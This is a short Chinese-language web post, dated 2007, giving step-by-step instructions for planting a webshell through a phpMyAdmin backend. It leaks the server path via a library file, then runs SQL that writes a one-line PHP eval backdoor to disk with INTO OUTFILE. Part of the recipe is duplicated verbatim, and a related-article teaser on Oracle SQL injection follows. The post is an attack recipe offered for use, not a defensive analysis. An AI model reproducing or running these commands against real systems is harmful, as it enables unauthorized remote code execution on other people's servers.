phpMyAdmin 后臺拿webshell
更新時間:2007年03月08日 00:00:00 作者:
1.如何拿到登陸密碼. 自己想辦法
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個Database.運行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對應網(wǎng)站得到webshell
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個Database.運行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對應網(wǎng)站得到webshell
相關文章
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
在國外對ORACLE的攻擊一直很收關注,只是國內研究的人不太多,或者技術不夠~這里我就打響第一炮吧2007-10-10